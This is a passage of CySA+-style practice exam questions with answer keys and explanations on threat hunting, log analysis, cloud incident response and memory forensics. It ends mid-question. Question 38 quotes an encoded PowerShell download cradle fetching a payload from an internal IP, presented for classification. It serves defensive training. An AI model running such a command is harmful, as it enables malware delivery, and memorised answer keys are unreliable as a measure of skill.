Creating an exception list for known legitimate processes or command lines that use rundll32.exe reduces false positives. However, the best approach is to modify the rule to include specific conditions such as parent process or command-line arguments that indicate malicious activity.

34
MCQeasy

A security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address on port 4444. The analyst checks the VPC Flow Logs and confirms the traffic. Which of the following is the most appropriate immediate action?

A.Create a new IAM role for the instance
B.Apply a restrictive security group to isolate the instance
C.Terminate the EC2 instance immediately
D.Update the route table to blackhole the traffic
AnswerB

Applying an isolation security group with no inbound or outbound rules immediately cuts off network communication at the hypervisor level. This effectively contains the threat and prevents further data exfiltration or command-and-control traffic while preserving the volatile memory and disk state of the EC2 instance for forensic analysis.

Why this answer

Isolating the EC2 instance by applying a restrictive security group stops the malicious communication and allows further investigation.

35
MCQmedium

An analyst is reviewing network traffic logs and notices a series of connections from an internal workstation to an external IP address on TCP port 53. The traffic consists of large DNS queries with random-looking subdomains. Which technique is most likely being used?

A.Domain generation algorithm (DGA)
B.DNS tunneling
C.Beaconing
D.HTTP smuggling
AnswerB

DNS tunneling abuses the DNS protocol by encoding non-DNS traffic, such as SSH or HTTP payloads, into the subdomains of queries sent to an attacker-controlled authoritative name server. The combination of high-volume, large-sized TXT or CNAME queries containing randomized subdomains directed to a consistent IP address is a classic signature of this exfiltration technique.

Why this answer

DNS tunneling is the technique of encoding non-DNS data (such as command-and-control instructions or exfiltrated data) inside DNS queries and responses, typically using large queries with random-looking subdomains to external authoritative servers controlled by the attacker. The use of TCP port 53 with large, high-entropy subdomains from an internal workstation to an external IP is a classic DNS tunneling signature.

Exam trap

CS0-004 often tests the confusion between DNS tunneling and DGA — both involve random-looking domains, but tunneling is about encapsulating data in DNS queries/responses, while DGA is about generating many domains for resilient C2 rendezvous.

How to eliminate wrong answers

Option A is wrong because a domain generation algorithm produces many pseudo-random domain names for malware to contact, but the traffic pattern here — large queries with encoded payloads to a single external resolver — indicates data encapsulation, not DGA domain enumeration. Option C is wrong because beaconing refers to periodic, low-volume check-ins to a C2 server; it does not inherently involve large DNS queries with random subdomains. Option D is wrong because HTTP smuggling exploits parsing discrepancies between HTTP intermediaries (e.g., CL.TE or TE.CL) and has nothing to do with DNS traffic on port 53.

36
Multi-Selecthard

During a threat hunt, an analyst uses Velociraptor to collect forensic artifacts from endpoints. Which THREE of the following artifacts are most useful for detecting persistence mechanisms?

Select 3 answers
A.List of installed updates
B.Scheduled tasks
C.ARP cache
D.Service configuration
E.Registry Run keys
AnswersB, D, E

Scheduled tasks are a native Windows mechanism that can trigger a binary or script when a user logs on, at system startup, or at regular intervals. Attackers routinely create named or hidden tasks to rerun malware or maintain command-and-control, and these tasks survive a reboot (unless disabled). Because the task description, action, triggers, and run-as user are all stored in the Task Scheduler database, examining it with Velociraptor can reveal suspicious persistence. This makes scheduled tasks an essential artifact in any threat hunt.

Why this answer

Scheduled tasks (B) are a classic persistence mechanism because attackers can register a task to execute malware at logon, startup, or on a recurring schedule, and Velociraptor can enumerate them via artifacts like Windows.System.TaskScheduler. Service configuration (D) is equally relevant since creating or modifying a Windows service (e.g., with a malicious ImagePath or auto-start type) allows code to run at boot under SYSTEM privileges. Registry Run keys (E) such as HKLM\Software\Microsoft\Windows\CurrentVersion\Run and HKCU equivalents are a well-known autostart location that malware abuses for persistence at user logon.

The list of installed updates (A) is useful for patch-level and vulnerability assessment, not for identifying persistence, and the ARP cache (C) only shows recent IP-to-MAC mappings, which is network-state data rather than a persistence indicator.

Exam trap

CS0-004 often tests the distinction between persistence artifacts and other forensic data; candidates may incorrectly select network-related artifacts like ARP cache or benign system information like installed updates, confusing general forensic value with persistence detection.

37
MCQhard

During a cloud security investigation, an analyst notices that an AWS IAM user generated multiple 'CreateKeyPair' API calls from an IP address outside the corporate network. Which AWS service is best suited to detect this type of anomalous behavior?

A.AWS CloudTrail
B.AWS Config
C.AWS GuardDuty
D.AWS Inspector
AnswerC

AWS GuardDuty is a continuous security monitoring service that actively analyzes CloudTrail management events, VPC flow logs, and DNS query logs using threat intelligence and machine learning. It is specifically engineered to detect anomalous API operations, credential compromise, and malicious activity within an AWS environment, generating actionable security findings.

Why this answer

AWS GuardDuty uses machine learning and threat intelligence to detect anomalous API activity, including unauthorized key creation, via CloudTrail logs.

38
MCQhard

An EDR agent reports that the process 'svchost.exe' spawned 'powershell.exe' with the command line: 'powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAwAC8AcABhAHkAbABvAGEAZAAuAGUAeABlACcAKQA='. Which of the following is the most appropriate classification for this activity?

A.True positive - but only if the IP is confirmed malicious
B.False positive - encoded commands are used by system administrators
C.False positive - svchost.exe commonly launches PowerShell for legitimate tasks
D.True positive - likely malicious activity using a LOLBin
AnswerD

This is a true positive because the execution represents a classic Living off the Land (LotL) attack where a legitimate system binary (powershell.exe) is leveraged to bypass security controls. The parent-child relationship of svchost.exe spawning PowerShell with encoded arguments is a highly reliable indicator of compromise (IoC) pointing to privilege escalation or lateral movement.

Why this answer

The encoded command decodes to 'IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.10/payload.exe')', which is a download cradle. Svchost.exe spawning PowerShell with such a command is highly suspicious and indicative of a true positive.

39
MCQmedium

An analyst is reviewing NetFlow data and notices a large amount of data being transferred from an internal database server to an external IP address on port 443 during non-business hours. The database server is not expected to initiate outbound connections. Which type of activity is most likely occurring?

A.Domain generation algorithm (DGA)
B.Lateral movement
C.Data exfiltration
D.Normal backup activity
AnswerC

Data exfiltration involves the unauthorized transfer of sensitive information from an internal network to an external, attacker-controlled destination. In NetFlow analysis, this is typically flagged by an anomalous, large-volume outbound connection (north-south traffic) originating from an internal host to an unfamiliar external IP address, especially outside of normal business hours.

Why this answer

The data transfer is large, to an external IP, on an encrypted port, outside business hours, and from a server that shouldn't initiate outbound connections. This strongly suggests data exfiltration.

40
MCQmedium

During a vulnerability scan of internal hosts, a security analyst finds a critical vulnerability with a CVSS score of 9.8. The affected system is a legacy application that cannot be patched immediately. What should the analyst do next?

A.Increase scan frequency to monitor the vulnerability
B.Mark the vulnerability as a false positive
C.Immediately shut down the system
D.Apply compensating controls and document the risk
AnswerD

When a permanent patch cannot be immediately deployed, implementing compensating controls—such as restricting network access via firewall rules or enabling specific intrusion prevention signatures—actively reduces the risk of exploitation. Documenting this risk and the associated temporary mitigations ensures compliance, maintains operational visibility, and establishes a clear path toward eventual remediation.

Why this answer

The analyst should document the finding and apply compensating controls, such as network segmentation or firewall rules, to mitigate risk until a patch can be applied.

41
MCQeasy

A SIEM alert is generated for a user who logged into a workstation at 2:00 AM, which is outside their normal working hours. The user's manager confirms the user was on call and had legitimate reason to log in. How should the analyst classify this alert?

A.False positive
B.False negative
C.True positive
D.True negative
AnswerA

This scenario represents a false positive because the SIEM generated an alert for a standard, benign user login. The detection rule incorrectly flagged normal, authorized workstation access as a potential security incident, requiring analysts to investigate and tune the rule to reduce noise.

Why this answer

The alert is a false positive because the activity is legitimate despite being outside normal hours.

42
MCQeasy

Which log source would best help detect an attacker using a domain generation algorithm (DGA) to communicate with a command and control server?

A.Firewall logs
B.Cloud audit logs
C.DNS query logs
D.Authentication logs
AnswerC

DNS query logs record every domain resolution request made by internal hosts, capturing the specific high-entropy, randomized domain names characteristic of Domain Generation Algorithms (DGAs). Analyzing these logs allows security analysts to detect anomalous NXDOMAIN spikes and identify compromised systems attempting to contact dynamic command-and-control servers.

Why this answer

DNS query logs are the best source because DGA malware generates many pseudo-random domain names and attempts to resolve them to locate its C2 server. These queries appear as high volumes of unique, algorithmically generated domains (e.g., 'ajk3n4lkj.com') that often result in NXDOMAIN responses. Firewall logs only show IP connections, not the domain names, and cloud audit logs track API activity, not DNS.

Authentication logs record login events, unrelated to DGA traffic.

Exam trap

CS0-004 often tests the misconception that firewall logs are sufficient for detecting C2, but DGA communication is best identified at the DNS layer before any IP connection is made.

How to eliminate wrong answers

Option A is wrong because firewall logs capture IP addresses and ports, not domain names; DGA domains must be resolved to IPs first, so the DNS query is the earlier and more direct indicator. Option B is wrong because cloud audit logs record API calls and resource changes in cloud environments, not DNS resolution attempts from endpoints. Option D is wrong because authentication logs track user login successes/failures and privilege changes, which are irrelevant to DGA-based C2 communication.

43
MCQmedium

During a threat hunting engagement, a hunter creates a hypothesis that adversaries may be using PowerShell to perform reconnaissance via Active Directory cmdlets. The hunter decides to look for events where PowerShell loaded the ActiveDirectory module. Which of the following detection techniques is most appropriate?

A.Create a SIEM correlation rule that triggers on Event ID 4104 (PowerShell Script Block Logging)
B.Perform a packet capture to analyze PowerShell network traffic
C.Deploy a YARA rule on endpoints to scan for malicious PowerShell scripts
D.Use osquery to query running PowerShell processes
AnswerA

Script Block Logging (Event ID 4104) records the actual PowerShell code executed, so loading the ActiveDirectory module and running its cmdlets is captured verbatim. This satisfies the hypothesis by surfacing AD reconnaissance commands that module-loading events alone would miss.

Why this answer

Event ID 4104 is generated by PowerShell Script Block Logging and captures the actual script block text executed, including the commands that import and invoke Active Directory cmdlets. A SIEM correlation rule on 4104 can detect patterns like 'Import-Module ActiveDirectory' or 'Get-ADUser' that indicate AD reconnaissance. This gives the hunter visibility into the exact PowerShell code executed on endpoints, which is the most direct evidence of the hypothesized behavior.

Exam trap

CS0-004 often tests the misconception that network-level tools (packet capture) or file-scanning tools (YARA) can detect in-memory PowerShell activity, when only script block or module logging provides that visibility.

How to eliminate wrong answers

Option B is wrong because packet capture only reveals network-level artifacts (LDAP queries, Kerberos traffic) and cannot confirm that PowerShell loaded the ActiveDirectory module on the host. Option C is wrong because YARA rules scan files on disk for known malicious patterns; they do not detect in-memory PowerShell module loading or script block execution. Option D is wrong because osquery can enumerate running processes but cannot see which PowerShell modules were loaded or what cmdlets were invoked within a process.

44
MCQmedium

A vulnerability scan of an internal web server shows a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF and is only accessible from internal IPs. Which of the following is the best next step?

A.Apply the patch immediately regardless of impact
B.Disable the server until a patch is available
C.Perform a risk assessment considering compensating controls
D.Ignore the finding because the server is internal
AnswerC

A CVSS base score reflects theoretical severity in a vacuum and does not account for environmental factors such as the WAF filtering malicious payloads and network ACLs restricting access to internal IPs; a documented risk assessment weighs these compensating controls against exploitability and business impact to set an appropriate remediation timeline.

Why this answer

CVSS score reflects severity but not exploitability in the specific environment. Considering compensating controls (WAF, network ACLs) may reduce risk, so a risk assessment is needed before patching.

45
MCQmedium

A security analyst is investigating a potential data exfiltration incident. They notice a host sending large amounts of data to an external IP address using DNS queries. Which technique is most likely being used?

A.DNS tunneling
B.DGA
C.HTTP smuggling
D.Beaconing
AnswerA

DNS tunneling abuses the DNS protocol to bypass network security controls by encoding exfiltrated data or command-and-control (C2) payloads within DNS queries and responses (such as TXT, CNAME, or MX records). Because firewalls typically allow unrestricted outbound UDP port 53 traffic to resolve domain names, attackers can establish a covert bidirectional communication channel to slowly leak sensitive information without triggering traditional perimeter defenses.

Why this answer

DNS tunneling encodes data in DNS queries and responses, allowing exfiltration over port 53, which is often allowed through firewalls.

46
Multi-Selecthard

During a threat hunt, an analyst identifies a suspicious process that is making outbound connections to multiple IP addresses on port 443 using TLS. The analyst suspects data exfiltration. Which THREE techniques would best help confirm this hypothesis?

Select 3 answers
A.Review EDR telemetry for file reads on sensitive documents prior to the connections
B.Inspect the TLS certificate presented by the remote server
C.Perform a memory dump of the process and look for encryption keys
D.Analyse NetFlow/IPFIX data for unusual data transfer volumes
E.Check the process' command line for suspicious parameters
AnswersA, D, E

Correlating EDR file-read telemetry with the timing of outbound TLS connections links sensitive document access to subsequent transmission. That temporal association distinguishes genuine staging and exfiltration from benign encrypted traffic, directly supporting the exfiltration hypothesis.

Why this answer

Option A is correct because correlating EDR file-read telemetry on sensitive documents with the timing of the outbound TLS connections establishes the data-collection stage of exfiltration, showing what data the process accessed before sending it. Option D is correct because NetFlow/IPFIX records byte and packet counts per flow, so unusually large outbound volumes to multiple destinations on port 443 reveal the data-transfer stage that distinguishes exfiltration from benign browsing. Option E is correct because the process command line often exposes exfiltration tooling and parameters such as destination lists, upload flags, or encoded payload arguments that explain the connections.

Option B does not belong because inspecting the remote TLS certificate only identifies the server or its issuer and does not confirm that data was stolen. Option C does not belong because dumping process memory to hunt for encryption keys is complex and unreliable, and finding keys would not by itself prove exfiltration occurred.

47
MCQmedium

A threat hunter is creating a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which of the following MITRE ATT&CK techniques should the hunter focus on?

A.T1547.001 - Registry Run Keys / Startup Folder
B.T1053.005 - Scheduled Task
C.T1071.001 - Web Protocols
D.T1059.001 - PowerShell
AnswerB

MITRE ATT&CK technique T1053.005 specifically represents the abuse of the Windows Task Scheduler to achieve persistence or elevate privileges. Threat actors leverage utilities like `schtasks.exe` or the Task Scheduler API to register malicious tasks that execute periodically or under specific trigger conditions, ensuring continuous access to the compromised host.

Why this answer

Scheduled tasks are a persistence technique (T1053.005) in the MITRE ATT&CK framework. The hunter should look for unusual scheduled tasks.

48
MCQhard

An analyst is investigating a potential memory injection attack on a Windows system. Which of the following memory analysis artifacts is most indicative of code injection?

A.A process with a memory region that is both writable and executable (RWX)
B.A process that is running from a temp directory
C.A process that has an unusually high handle count
D.A process with multiple threads in a suspended state
AnswerA

Memory injection techniques, such as process hollowing or DLL injection, require allocating memory with write permissions to copy payload code, and then execute permissions to run it. Legitimate software rarely allocates memory regions with concurrent Read-Write-Execute (RWX) permissions due to security mitigations like Data Execution Prevention (DEP) or W^X (Write XOR Execute). Finding an RWX memory region strongly indicates that shellcode has been injected and is prepared for execution.

Why this answer

A process that is executing in a region of memory that is both writable and executable (RWX) is a strong indicator of injected code, as legitimate processes typically have separate write and execute permissions.

49
MCQmedium

A security team is configuring a vulnerability scanner for external scanning of their public-facing web applications. Which scan type will provide the most accurate assessment of vulnerabilities without requiring credentials?

A.External scan
B.Agent-based scan
C.Authenticated scan
D.Internal scan
AnswerA

External scans are conducted from outside the organization's network perimeter, directly simulating the perspective of an external attacker targeting public-facing assets. This approach identifies exposed ports, misconfigured firewalls, and unpatched vulnerabilities in public web applications without requiring internal network access or system credentials.

Why this answer

An external scan assesses the attack surface from the internet perspective, typically without credentials. Agent-based and authenticated scans require credentials or internal access.

50
MCQeasy

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address. The username used does not exist in Active Directory. The analyst checks the source IP and finds it belongs to a known vulnerability scanner. What classification should the analyst assign to this alert?

A.False negative
B.True positive
C.True negative
D.False positive
AnswerD

A false positive occurs when benign or authorized activity, such as an approved internal vulnerability scan, triggers a security alert as if it were malicious. Analysts must tune SIEM rules to recognize these authorized sources to prevent alert fatigue from these non-threatening events.

Why this answer

A false positive is an alert that fires but does not represent a genuine security incident. Here, the 'failed login' is benign because the source is an authorized vulnerability scanner and the username does not exist — there is no real attacker or compromised account, so the SIEM rule matched on activity that is expected and non-malicious.

Exam trap

CS0-004 often tests the confusion between 'false positive' and 'true negative' — candidates forget that a false positive requires an alert to have actually fired on benign activity.

How to eliminate wrong answers

Option A is wrong because a false negative is a real incident that the SIEM failed to detect — the opposite of what occurred here (the alert did fire). Option B is wrong because a true positive means the alert correctly identified a real security event; a scanner probing a non-existent account is not an actual attack. Option C is wrong because a true negative is the correct absence of an alert — no alert was suppressed here; an alert was generated and then correctly dismissed.

51
MCQhard

During a threat hunt, an analyst uses osquery to query endpoints for processes that have spawned from Microsoft Word but have network connections. Which of the following TTPs does this technique most likely detect?

A.Pass-the-hash attack
B.Spearphishing attachment leading to macro execution
C.Kerberoasting
D.Data exfiltration over DNS
AnswerB

When a user opens a malicious spearphishing attachment, embedded VBA macros often execute and spawn child processes such as PowerShell, cmd.exe, or lolbins to download secondary payloads. Detecting Microsoft Word (winword.exe) spawning these command-line interpreters via osquery is a classic indicator of this initial access technique.

Why this answer

Attackers often use macro-enabled documents to execute code, making Word spawn abnormal child processes like PowerShell or cmd.exe, which then connect outbound.

52
MCQmedium

During a threat hunting exercise, a hunter creates a hypothesis that a threat actor is using PowerShell to download payloads from a remote server. Which ATT&CK technique is the hunter most likely investigating?

A.T1047 - Windows Management Instrumentation
B.T1105 - Ingress Tool Transfer
C.T1071.001 - Web Protocols
D.T1059.001 - PowerShell
AnswerB

This technique precisely describes the action of an adversary transferring tools, utilities, or malware payloads from an external system into the target environment. When a threat hunter focuses on detecting PowerShell-based file downloads, they are specifically hunting for evidence of this ingress activity to identify initial staging or tool installation.

Why this answer

T1105 (Ingress Tool Transfer) covers the adversary transferring tools or payloads into the victim environment from an external system, including via PowerShell downloads. The hypothesis — PowerShell downloading payloads from a remote server — maps directly to the transfer of a tool into the environment. T1059.001 describes PowerShell execution itself, but the specific behavior of pulling a payload in is T1105.

Exam trap

CS0-004 often tests the overlap between PowerShell execution (T1059.001) and the payload download behavior (T1105) — candidates pick the execution technique when the hypothesis is specifically about transferring a tool into the environment.

How to eliminate wrong answers

Option A (T1047) is wrong because WMI is a lateral movement/execution technique using Windows Management Instrumentation, not the transfer of a payload from a remote server. Option C (T1071.001) is wrong because Web Protocols (HTTP/HTTPS) is a command-and-control channel technique — it describes the C2 protocol, not the act of downloading a tool. Option D (T1059.001) is wrong because PowerShell is the execution vehicle; the question's hypothesis emphasizes downloading payloads, which is the ingress transfer behavior, not merely running PowerShell.

53
MCQeasy

During a network traffic analysis, a security analyst notices a high volume of DNS queries to a domain that is algorithmically generated. The domain names follow a random pattern and are not resolved to known IP addresses. Which technique is most likely being used?

A.DNS tunneling
B.Beaconing
C.Domain generation algorithm (DGA)
D.HTTP smuggling
AnswerC

A Domain Generation Algorithm (DGA) is a technique used by malware to periodically generate a large number of pseudo-random domain names that can be used as rendezvous points for command-and-control (C2) servers. This allows attackers to evade static domain blocking and IP reputation lists, as the malware and the attacker only need to register a single domain from the generated list to establish a successful connection.

Why this answer

Domain Generation Algorithms (DGAs) are commonly used by malware to generate a large number of potential C2 domain names to evade static blocklists.

54
MCQhard

During a threat hunt, an analyst queries osquery to find processes where the 'cmdline' contains ' -e ' and the parent process is not 'explorer.exe'. This query is designed to detect which technique?

A.Malicious PowerShell execution
B.Lateral movement via PsExec
C.DLL injection via rundll32
D.Scheduled task creation
AnswerA

Threat actors frequently utilize PowerShell to execute obfuscated payloads, often passing Base64-encoded scripts via the `-e` or `-EncodedCommand` flags to bypass legacy security controls. An osquery search targeting these specific command-line arguments, especially when spawned by unusual parent processes like web servers or office applications, is a classic method for detecting active malicious PowerShell execution.

Why this answer

PowerShell with -e (encoded command) is often used for obfuscation; unusual parent processes suggest malicious execution.

55
MCQhard

A threat hunter analyzes NetFlow data and observes a host communicating with multiple external IP addresses on high-numbered ports (e.g., 49300-49500) during off-hours. The communications are short-lived and occur in burst patterns. The hunter suspects data exfiltration. Which of the following analysis techniques would best confirm or refute this suspicion?

A.Correlate with authentication logs to see if the user is logged in
B.Check the host's registry for persistence mechanisms
C.Perform a full packet capture on the host's traffic
D.Review DNS logs for domain generation algorithm patterns
AnswerC

Performing a full packet capture (PCAP) is the most effective action because it allows the analyst to conduct deep packet inspection on the suspicious traffic. By analyzing the actual payloads and protocol headers, the threat hunter can definitively determine if sensitive data is being exfiltrated or if the traffic is benign. This provides the granular visibility that high-level NetFlow metadata lacks, confirming the exact nature of the transmission.

Why this answer

A full packet capture provides the actual payload and protocol details of the suspicious traffic, allowing the hunter to confirm whether data is being exfiltrated (e.g., via HTTP POST, DNS tunneling, or custom protocols) and to identify the destination and content. NetFlow only provides metadata (IPs, ports, bytes, timestamps), so packet-level inspection is required to validate the exfiltration hypothesis. This is the most direct confirmatory technique.

Exam trap

CS0-004 often tests the distinction between flow metadata (NetFlow) and payload inspection (packet capture), so candidates must recognize that confirming exfiltration requires seeing the actual data, not just traffic patterns.

How to eliminate wrong answers

Option A is wrong because authentication logs only show whether a user is logged in; they do not reveal what data is being transmitted or to where, and attackers often use compromised service accounts or scheduled tasks. Option B is wrong because checking the registry for persistence identifies how an attacker maintains access, not whether data is being exfiltrated. Option D is wrong because DNS logs may reveal DGA patterns, but the observed traffic is on high-numbered ports to multiple external IPs, not necessarily DNS; reviewing DNS logs would not confirm the actual data transfer.

56
Multi-Selectmedium

A security analyst is configuring a vulnerability scanner for an internal network. Which two settings are most important for reducing false positives during the scan? (Choose two.)

Select 2 answers
A.Disabling unnecessary plug-ins
B.Enabling credentialed scanning
C.Using a higher scan intensity
D.Scanning from multiple IP addresses
E.Scanning only during business hours
AnswersA, B

Disabling unnecessary plug-ins prevents the scanner from running checks that are not relevant to the environment, such as Windows-specific tests against Linux hosts. Each plug-in produces findings, and if it probes for software or services that are absent, it can generate false positives based on erroneous banner matches. By tailoring the active plug-in set to the actual asset inventory and exposed services, the analyst reduces meaningless alerts and focuses the scan on likely vulnerabilities. This is a core tuning step that directly reduces false positives while preserving comprehensive coverage.

Why this answer

Option A is correct because disabling unnecessary plug-ins prevents the scanner from running checks that do not apply to the target hosts, such as Windows-specific or web-application tests against systems that do not use those technologies, which otherwise produce misleading findings. Option B is correct because credentialed scanning lets the scanner authenticate to hosts and read local configuration, patch levels, and installed software directly, so it can confirm whether a vulnerability actually exists instead of inferring it from ambiguous banner or version data, which is the single most effective way to cut false positives. Option C is wrong because raising scan intensity only makes the scan more aggressive and can increase false positives and network disruption rather than reduce them.

Option D is wrong because scanning from multiple source IP addresses does not improve accuracy and may complicate firewall or IDS behavior. Option E is wrong because restricting the scan window to business hours affects availability and timing, not the accuracy of the results.

Exam trap

CS0-004 often tests the difference between scan accuracy (credentialed scanning, plug-in tuning) and scan logistics (intensity, scheduling, source IPs), tempting candidates to pick operational settings that do not address false positives.

57
Multi-Selecteasy

A security analyst is performing a vulnerability scan on an internal network. The analyst wants to ensure the scanner can identify vulnerabilities in applications that require authentication. Which TWO scan configurations should be used?

Select 2 answers
A.Scan with default credentials
B.Non-credentialed scan
C.Agent-based scan
D.External scan
E.Credentialed scan
AnswersC, E

Agent-based scans utilize a lightweight software package installed directly on the target endpoint to perform local, authenticated assessments. This method eliminates the need to manage network credentials or open inbound ports, allowing the agent to execute with local system privileges. It is highly effective for transient assets, such as remote laptops, which may not be consistently connected to the corporate network during scheduled network scans.

Why this answer

Credentialed scans allow the scanner to authenticate to systems and perform deeper checks, while authenticated scans (agent-based) can also provide access.

58
MCQeasy

Which of the following log sources would be most useful for detecting DNS tunneling?

A.DNS logs
B.Firewall logs
C.Authentication logs
D.Endpoint EDR logs
AnswerA

DNS logs record the specific domain queries (such as TXT, CNAME, or MX records) and responses that are manipulated during a DNS tunneling attack. Analyzing these logs allows security analysts to detect anomalies like unusually long subdomains, high query volume to a single authoritative name server, and encoded payloads within the queries.

Why this answer

DNS tunneling encodes data inside DNS queries and responses (often in subdomain labels or TXT records), so the authoritative DNS server logs and recursive resolver query logs are the only place where the full query strings are visible. Analyzing DNS logs for high-entropy subdomains, unusual query volume, or long TXT responses is the primary detection method. Firewall, auth, and EDR logs lack the DNS payload detail needed to spot the tunnel.

Exam trap

The trap is that candidates pick firewall logs because DNS uses port 53, but firewalls log connections, not query contents — only DNS logs contain the query names and payloads needed to detect tunneling.

How to eliminate wrong answers

Option B is wrong because firewall logs typically record connection 5-tuples and may log DNS to port 53, but they do not capture the query name or payload contents needed to identify tunneling. Option C is wrong because authentication logs record logon events and credential use, which are unrelated to DNS exfiltration channels. Option D is wrong because EDR logs capture process, file, and network activity on endpoints; while EDR may see a process making DNS calls, it does not log the DNS query strings or response payloads that reveal tunneling.

59
MCQmedium

An analyst detects a process named 'powershell.exe' executing a base64-encoded command. Which type of analysis is most appropriate to decode and understand the command?

A.Process analysis
B.Memory analysis
C.Registry analysis
D.Network traffic analysis
AnswerA

Process analysis is the correct first step because it allows the analyst to inspect the process metadata, parent-child relationships, and command-line arguments. By examining the command line of the running powershell.exe process, the analyst can extract and decode obfuscated or Base64-encoded scripts directly to understand the payload's intent.

Why this answer

Process analysis is the most appropriate because it focuses on the live execution context of a running process, including its command-line arguments, loaded modules, and parent-child relationships. In this case, the base64-encoded command is part of the process's command line, which can be decoded to reveal the actual PowerShell script or commands being executed. Tools like Process Explorer, Process Monitor, or PowerShell's own logging (e.g., Script Block Logging) can capture and decode this information.

This directly addresses the need to understand what the process is doing.

Exam trap

CS0-004 often tests the distinction between process analysis and memory analysis, as candidates may confuse the two when dealing with encoded commands; the trap is assuming that memory analysis is needed to decode command-line arguments, when in fact process analysis captures the command line directly.

How to eliminate wrong answers

Option B is wrong because memory analysis examines the contents of RAM for artifacts like injected code or credentials, but it does not directly decode command-line arguments; while it can capture process memory, the base64 string is typically in the command line, not necessarily in memory as plaintext. Option C is wrong because registry analysis focuses on configuration and persistence mechanisms stored in the Windows Registry, not on decoding runtime process arguments. Option D is wrong because network traffic analysis inspects packets for malicious communications, but the base64-encoded command is local to the process and not necessarily transmitted over the network.

60
Multi-Selecthard

During a memory forensics investigation, a security analyst identifies a process that appears to have code injected into it. The process is 'explorer.exe' and its memory contains sections that are not part of the original executable. Which TWO memory analysis techniques should the analyst use to confirm code injection?

Select 2 answers
A.List the process's open handles
B.Examine the process's environment variables
C.Check the process's parent process
D.Scan for executable memory pages not backed by a file on disk
E.Compare the loaded DLL list with known good baselines
AnswersD, E

A definitive sign of code injection is the presence of an executable memory region that is not backed by an on-disk file. Malicious shellcode is often allocated with VirtualAllocEx and written via WriteProcessMemory, producing a private, executable page that does not map to any section object. Memory forensics tools like Volatility's malfind enumerate the Virtual Address Descriptor (VAD) tree to identify such executable pages without a backing file, making this technique a core method for detecting fileless injection.

Why this answer

Option D is correct because injected code typically resides in memory regions that are executable but have no corresponding file on disk; tools like Volatility's malfind or PE-sieve flag such RWX/VAD regions as strong indicators of injection. Option E is correct because comparing the loaded module/DLL list against a known-good baseline reveals unexpected or unsigned DLLs loaded into explorer.exe, which is a classic sign of DLL injection or reflective loading. Option A is not specific to code injection, since open handles (files, registry keys, mutexes) are normal for explorer.exe and do not prove injected code.

Option B is not relevant, as environment variables are process metadata and are not used to detect injected executable memory. Option C is also not diagnostic, because the parent process (typically userinit.exe or winlogon.exe) only shows process lineage, not memory-resident code injection.

Exam trap

CS0-004 often tests whether candidates can distinguish memory-injection indicators (unbacked executable pages, anomalous DLLs) from general process metadata like handles, environment variables, and parentage, which do not confirm injection.

61
MCQmedium

A security analyst is investigating an alert from the EDR tool indicating that a process named 'powershell.exe' was launched with a parent process 'winword.exe'. The user's workstation had received a phishing email earlier that day. Which type of attack does this likely indicate?

A.Process hollowing
B.Living off the land binary (LOLBin) abuse
C.Injection of code into explorer.exe
D.Scheduled task creation
AnswerB

This alert highlights Living off the Land Binary (LOLBin) abuse, where attackers leverage trusted, pre-installed system utilities like PowerShell to execute malicious commands. When a productivity application like Microsoft Word spawns a command-line interpreter, it strongly indicates a macro-based initial access vector exploiting native binaries to bypass traditional application whitelisting.

Why this answer

The parent-child relationship of winword.exe spawning powershell.exe is a classic indicator of a malicious macro executing PowerShell code, often used in phishing attacks.

62
MCQmedium

A cloud security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The instance is part of an auto-scaling group. What is the best immediate action?

A.Isolate the instance by modifying its security group to deny all traffic.
B.Terminate the instance immediately to stop the threat.
C.Ignore the alert because auto-scaling groups are ephemeral.
D.Update the GuardDuty threat list to ignore that IP.
AnswerA

Modifying the instance's security group to deny all inbound and outbound traffic effectively isolates it from the network. This containment strategy immediately stops any ongoing malicious activity from spreading or exfiltrating data, while crucially preserving the instance's current state, memory, and disk for subsequent forensic analysis. This allows security analysts to investigate the root cause, understand the attack vector, and gather evidence without destroying critical information.

Why this answer

Isolating the instance by removing it from the security group or using a quarantine VPC prevents further communication while preserving forensic data.

63
MCQmedium

An analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The analyst checks the VPC Flow Logs and confirms the communication. What is the next best step in the investigation?

A.Run a vulnerability scan on the instance.
B.Ignore the alert because GuardDuty often produces false positives.
C.Isolate the EC2 instance from the network.
D.Delete the EC2 instance immediately.
AnswerC

Isolating the EC2 instance by modifying its security groups to block all inbound and outbound traffic is the primary containment step. This action immediately halts malicious command-and-control (C2) communication or data exfiltration. Crucially, network isolation preserves the volatile memory (RAM) and disk state of the running instance for subsequent forensic analysis.

Why this answer

Since the EC2 instance is compromised, isolating it (e.g., by modifying security groups or stopping the instance) prevents further malicious activity while preserving evidence.

64
MCQmedium

A security analyst notices repeated alerts for 'DNS query to known malicious domain' from multiple internal hosts. Upon investigation, the analyst finds that the domain is legitimate and used by a third-party service. What should the analyst do to reduce false positives?

A.Add the domain to a whitelist in the SIEM
B.Disable the alert rule for DNS queries
C.Increase the severity of the alert
D.Block the domain on the firewall
AnswerA

Adding a known-safe, high-volume domain to an exclusion list or whitelist within the SIEM suppresses repetitive false positive alerts without degrading overall detection capabilities. This tuning process optimizes analyst workflow by reducing alert fatigue while preserving the integrity of the underlying correlation rule for other unverified domains.

Why this answer

Adding the domain to a whitelist ensures that legitimate traffic is not flagged, reducing false positives without disabling the rule entirely.

65
MCQhard

An analyst is investigating a potential compromise on a Windows endpoint. EDR telemetry shows that 'powershell.exe' was launched by 'svchost.exe', which in turn was spawned by 'services.exe'. The analyst observes that 'powershell.exe' then executed a script that downloaded an executable. What should the analyst be most concerned about?

A.Services.exe spawning svchost.exe is a sign of malware infection
B.Powershell.exe downloading an executable is a false positive from Windows Update
C.This indicates a potential LOLBin attack using svchost.exe to launch powershell.exe
D.Svchost.exe spawning powershell.exe is a normal Windows operation
